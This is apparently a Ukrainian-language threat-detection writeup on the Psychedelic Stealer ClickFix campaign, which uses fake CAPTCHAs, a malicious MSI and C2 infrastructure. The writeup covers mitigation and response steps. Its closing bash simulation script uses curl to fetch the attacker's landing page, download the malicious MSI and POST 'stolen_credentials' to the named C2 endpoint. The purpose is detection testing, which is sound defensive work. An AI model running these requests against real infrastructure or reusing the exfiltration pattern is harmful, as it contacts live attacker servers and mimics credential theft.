Психоделічний Стилер: Коли CAPTCHA Стає Інсталятором
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Arctic Wolf Labs відстежує кампанію, що використовує підроблені CAPTCHA від Cloudflare, вбудовані в зламані українські бізнес-сайти. Атака типу ClickFix переконує користувачів виконати MSI-пакет, який встановлює Psychedelic Stealer, інфостілер, розроблений для збору облікових даних браузера, токенів акаунтів і даних криптовалютних гаманців. Шкідливе ПЗ також підтримує постійні віддалені завдання через виділену інфраструктуру C2.
Розслідування
Розслідування виявило вбудовані іфрейми на легітимних українських вебсайтах, які перенаправляють відвідувачів у підроблену потік верифікації. Аналітики також ідентифікували панель управління приманками з брендом Rublevka TDS, яка контролює конфігурацію команд і записує телеметрію відвідувачів. Технічний аналіз MSI-пакету виявив зашифровану URL-адресу наступного етапу разом із основними процедурами шкідливого ПЗ для кражі облікових даних і даних.
Пом’якшення
Організації повинні спостерігати за підозрілими виконаннями Windows Installer (msiexec.exe) запущеними через веббраузери або інтерфейси командного рядка. Веб-фільтрація повинна блокувати відомі шкідливі домени, в той час як захисники повинні контролювати легітимні вебактиви на предмет несанкціонованих вбудованих іфреймів. Посилення контролю на кінцевих точках навколо створення запланованих завдань може додатково знизити ризик збереження.
Відповідь
При виявленні активності Psychedelic Stealer ізолюйте уражені кінцеві точки для припинення подальшого ексфільтрації даних або латерального руху. Аудитуйте профілі браузерів і локальне зберігання на предмет компрометованих облікових даних, токенів автентифікації й даних гаманців. Перевірте мережеву телеметрію на зв’язок з відомою C2 інфраструктурою та огляньте системи на предмет несанкціонованих запланованих завдань або підозрілих вбудованих компонентів.
Сценарій атаки
Детекція
Підозрілий запис RunMRU зі семантикою LOLBin (через registry_event)
Можлива спроба віддаленого встановлення MSI-файлу (через cmdline)
Можливі C2-комунікації через HTTP до прямої IP-адреси з неспецифічним портом (через proxy)
Підозрілий завантаження файлу через пряму IP-адресу (через proxy)
IOC (HashSha256) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором
IOC (SourceIP) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором
IOC (DestinationIP) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором
Виявлення доступу до інфраструктури Psychedelic Stealer [Вебсервер]
Виконання симуляції
-
Наратив атаки та команди: Зловмисник прагне інфікувати ціль через механізм підробленої CAPTCHA. Симуляція імітує поведінку браузера жертви: спочатку, перехід на цільову сторінку зловмисника для уникнення початкового контролю, потім запит вручення шкідливого MSI-пакету, і нарешті, ініціація C2-зв’язку через HTTP POST до контрольного скрипту зловмисника. Ця послідовність призначена для імітації точних URI-шаблонів, виявлених в інфраструктурі Psychedelic Stealer.
-
Скрипт регресійного тестування: Наступний скрипт використовує
curlщоб імітувати три окремі стадії логіки виявлення.#!/bin/bash # Скрипт симуляції доступу до інфраструктури Psychedelic Stealer TARGET_DOMAIN="uasputnik.com" echo "[+] Початок симуляції доступу до інфраструктури Psychedelic Stealer..." # Етап 1: Імітація відвідування цільової сторінки (Вибір 1) echo "[*] Імітація GET-запиту до цільової сторінки..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # Етап 2: Імітація завантаження шкідливого MSI (Вибір 2) echo "[*] Імітація GET-запиту для завантаження пакету..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # Етап 3: Імітація C2-комунікації через POST (Вибір 3) echo "[*] Імітація POST-запиту до кінцевої точки C2..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] Симуляція завершена. Перевірте SIEM на предмет тривог." -
Команди очищення:
# Оскільки ця симуляція заснована на мережі, жодних файлів не створюється у локальній системі # якщо спеціально не зазначено. Очищення локальної файлової системи не потрібно. echo "[+] Очищення завершено."